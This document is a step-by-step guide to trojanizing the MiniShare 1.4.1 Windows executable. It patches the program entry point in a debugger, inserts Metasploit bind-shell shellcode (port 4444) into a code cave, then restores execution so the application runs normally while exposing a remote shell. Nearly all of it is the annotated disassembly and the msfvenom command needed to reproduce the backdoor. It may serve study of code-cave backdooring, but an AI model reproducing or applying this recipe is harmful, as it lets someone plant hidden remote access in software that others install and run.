Steps to backdoor Minshare.exe (version 1.4.1):

1. Download Minshare.exe from this link https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip
2. Open it in Immunity Debugger
3. Replace the program entry point with the 'Program Entry Point' instruction below
4. Jump to address 0x00961C08
5. Binary paste the code below (you'll need to filter out only the opcodes)
6. Select modifications and Copy to executable
7. Save the new executable
8. Run the application
9. Connect to the shell at port 4444 (you can use msfconsole and setup a multi/handler listener)
10. You'll get a shell to the target machine and the application runs as usual (as long as a listener is setup and ready to connect to port 4444)


Shellcode command: msfvenom -p windows/shell_bind_tcp LPORT=4444  -f c EXITFUNC=none



00960000 > $-E9 031C0000    JMP minishar.00961C08  				 -> Program entry point


00960006   . 8DBE EBEFAAFF  LEA EDI,DWORD PTR DS:[ESI+FFAAEFEB]  -> Address to return to


00961C08   90               NOP
00961C09   90               NOP
00961C0A   90               NOP
00961C0B   90               NOP
00961C0C   90               NOP
00961C0D   60               PUSHAD								 -> Saving registers to stack
00961C0E   9C               PUSHFD								 -> Saving flags to stack
00961C0F   90               NOP
00961C10   90               NOP
00961C11   90               NOP
00961C12   90               NOP
00961C13   90               NOP
00961C14   90               NOP
00961C15   FC               CLD									-> TCP bind shellcode. Binds a shell at port 4444
00961C16   E8 82000000      CALL minishar.00961C9D
00961C1B   60               PUSHAD
00961C1C   89E5             MOV EBP,ESP
00961C1E   31C0             XOR EAX,EAX
00961C20   64:8B50 30       MOV EDX,DWORD PTR FS:[EAX+30]
00961C24   8B52 0C          MOV EDX,DWORD PTR DS:[EDX+C]
00961C27   8B52 14          MOV EDX,DWORD PTR DS:[EDX+14]
00961C2A   8B72 28          MOV ESI,DWORD PTR DS:[EDX+28]
00961C2D   0FB74A 26        MOVZX ECX,WORD PTR DS:[EDX+26]
00961C31   31FF             XOR EDI,EDI
00961C33   AC               LODS BYTE PTR DS:[ESI]
00961C34   3C 61            CMP AL,61
00961C36   7C 02            JL SHORT minishar.00961C3A
00961C38   2C 20            SUB AL,20
00961C3A   C1CF 0D          ROR EDI,0D
00961C3D   01C7             ADD EDI,EAX
00961C3F  ^E2 F2            LOOPD SHORT minishar.00961C33
00961C41   52               PUSH EDX
00961C42   57               PUSH EDI
00961C43   8B52 10          MOV EDX,DWORD PTR DS:[EDX+10]
00961C46   8B4A 3C          MOV ECX,DWORD PTR DS:[EDX+3C]
00961C49   8B4C11 78        MOV ECX,DWORD PTR DS:[ECX+EDX+78]
00961C4D   E3 48            JECXZ SHORT minishar.00961C97
00961C4F   01D1             ADD ECX,EDX
00961C51   51               PUSH ECX
00961C52   8B59 20          MOV EBX,DWORD PTR DS:[ECX+20]
00961C55   01D3             ADD EBX,EDX
00961C57   8B49 18          MOV ECX,DWORD PTR DS:[ECX+18]
00961C5A   E3 3A            JECXZ SHORT minishar.00961C96
00961C5C   49               DEC ECX
00961C5D   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]
00961C60   01D6             ADD ESI,EDX
00961C62   31FF             XOR EDI,EDI
00961C64   AC               LODS BYTE PTR DS:[ESI]
00961C65   C1CF 0D          ROR EDI,0D
00961C68   01C7             ADD EDI,EAX
00961C6A   38E0             CMP AL,AH
00961C6C  ^75 F6            JNZ SHORT minishar.00961C64
00961C6E   037D F8          ADD EDI,DWORD PTR SS:[EBP-8]
00961C71   3B7D 24          CMP EDI,DWORD PTR SS:[EBP+24]
00961C74  ^75 E4            JNZ SHORT minishar.00961C5A
00961C76   58               POP EAX
00961C77   8B58 24          MOV EBX,DWORD PTR DS:[EAX+24]
00961C7A   01D3             ADD EBX,EDX
00961C7C   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
00961C80   8B58 1C          MOV EBX,DWORD PTR DS:[EAX+1C]
00961C83   01D3             ADD EBX,EDX
00961C85   8B048B           MOV EAX,DWORD PTR DS:[EBX+ECX*4]
00961C88   01D0             ADD EAX,EDX
00961C8A   894424 24        MOV DWORD PTR SS:[ESP+24],EAX
00961C8E   5B               POP EBX
00961C8F   5B               POP EBX
00961C90   61               POPAD
00961C91   59               POP ECX
00961C92   5A               POP EDX
00961C93   51               PUSH ECX
00961C94   FFE0             JMP EAX
00961C96   5F               POP EDI
00961C97   5F               POP EDI
00961C98   5A               POP EDX
00961C99   8B12             MOV EDX,DWORD PTR DS:[EDX]
00961C9B  ^EB 8D            JMP SHORT minishar.00961C2A
00961C9D   5D               POP EBP
00961C9E   68 33320000      PUSH 3233
00961CA3   68 7773325F      PUSH 5F327377
00961CA8   54               PUSH ESP
00961CA9   68 4C772607      PUSH 726774C
00961CAE   FFD5             CALL EBP
00961CB0   B8 90010000      MOV EAX,190
00961CB5   29C4             SUB ESP,EAX
00961CB7   54               PUSH ESP
00961CB8   50               PUSH EAX
00961CB9   68 29806B00      PUSH minishar.006B8029
00961CBE   FFD5             CALL EBP
00961CC0   6A 08            PUSH 8
00961CC2   59               POP ECX
00961CC3   50               PUSH EAX
00961CC4  ^E2 FD            LOOPD SHORT minishar.00961CC3
00961CC6   40               INC EAX
00961CC7   50               PUSH EAX
00961CC8   40               INC EAX
00961CC9   50               PUSH EAX
00961CCA   68 EA0FDFE0      PUSH E0DF0FEA
00961CCF   FFD5             CALL EBP
00961CD1   97               XCHG EAX,EDI
00961CD2   68 0200115C      PUSH 5C110002
00961CD7   89E6             MOV ESI,ESP
00961CD9   6A 10            PUSH 10
00961CDB   56               PUSH ESI
00961CDC   57               PUSH EDI
00961CDD   68 C2DB3767      PUSH 6737DBC2
00961CE2   FFD5             CALL EBP
00961CE4   57               PUSH EDI
00961CE5   68 B7E938FF      PUSH FF38E9B7
00961CEA   FFD5             CALL EBP
00961CEC   57               PUSH EDI
00961CED   68 74EC3BE1      PUSH E13BEC74
00961CF2   FFD5             CALL EBP
00961CF4   57               PUSH EDI
00961CF5   97               XCHG EAX,EDI
00961CF6   68 756E4D61      PUSH 614D6E75
00961CFB   FFD5             CALL EBP
00961CFD   68 636D6400      PUSH minishar.00646D63
00961D02   89E3             MOV EBX,ESP
00961D04   57               PUSH EDI
00961D05   57               PUSH EDI
00961D06   57               PUSH EDI
00961D07   31F6             XOR ESI,ESI
00961D09   6A 12            PUSH 12
00961D0B   59               POP ECX
00961D0C   56               PUSH ESI
00961D0D  ^E2 FD            LOOPD SHORT minishar.00961D0C
00961D0F   66:C74424 3C 010>MOV WORD PTR SS:[ESP+3C],101
00961D16   8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
00961D1A   C600 44          MOV BYTE PTR DS:[EAX],44
00961D1D   54               PUSH ESP
00961D1E   50               PUSH EAX
00961D1F   56               PUSH ESI
00961D20   56               PUSH ESI
00961D21   56               PUSH ESI
00961D22   46               INC ESI
00961D23   56               PUSH ESI
00961D24   4E               DEC ESI
00961D25   56               PUSH ESI
00961D26   56               PUSH ESI
00961D27   53               PUSH EBX
00961D28   56               PUSH ESI
00961D29   68 79CC3F86      PUSH 863FCC79
00961D2E   FFD5             CALL EBP
00961D30   89E0             MOV EAX,ESP
00961D32   90               NOP
00961D33   56               PUSH ESI
00961D34   90               NOP
00961D35   FF30             PUSH DWORD PTR DS:[EAX]
00961D37   68 08871D60      PUSH 601D8708
00961D3C   FFD5             CALL EBP
00961D3E   BB AAC5E25D      MOV EBX,5DE2C5AA
00961D43   68 A695BD9D      PUSH 9DBD95A6
00961D48   FFD5             CALL EBP
00961D4A   3C 06            CMP AL,6
00961D4C   7C 0A            JL SHORT minishar.00961D58
00961D4E   80FB E0          CMP BL,0E0
00961D51   75 05            JNZ SHORT minishar.00961D58
00961D53   BB 4713726F      MOV EBX,6F721347
00961D58   6A 00            PUSH 0
00961D5A   53               PUSH EBX
00961D5B   90               NOP
00961D5C   90               NOP
00961D5D   54               PUSH ESP								 -> Realigning stack to 0022FFA0
00961D5E   58               POP EAX
00961D5F   66:05 0002       ADD AX,200
00961D63   50               PUSH EAX
00961D64   5C               POP ESP
00961D65   9D               POPFD								     -> Restoring flags
00961D66   61               POPAD								     -> Restoring Registers
00961D67   9C               PUSHFD								     -> Executing instructions overwritten by JMP at program entry point
00961D68   BE 15209500      MOV ESI,minishar.00952015
00961D6D  -E9 94E2FFFF      JMP minishar.00960006				     -> Restoring the application execution flow


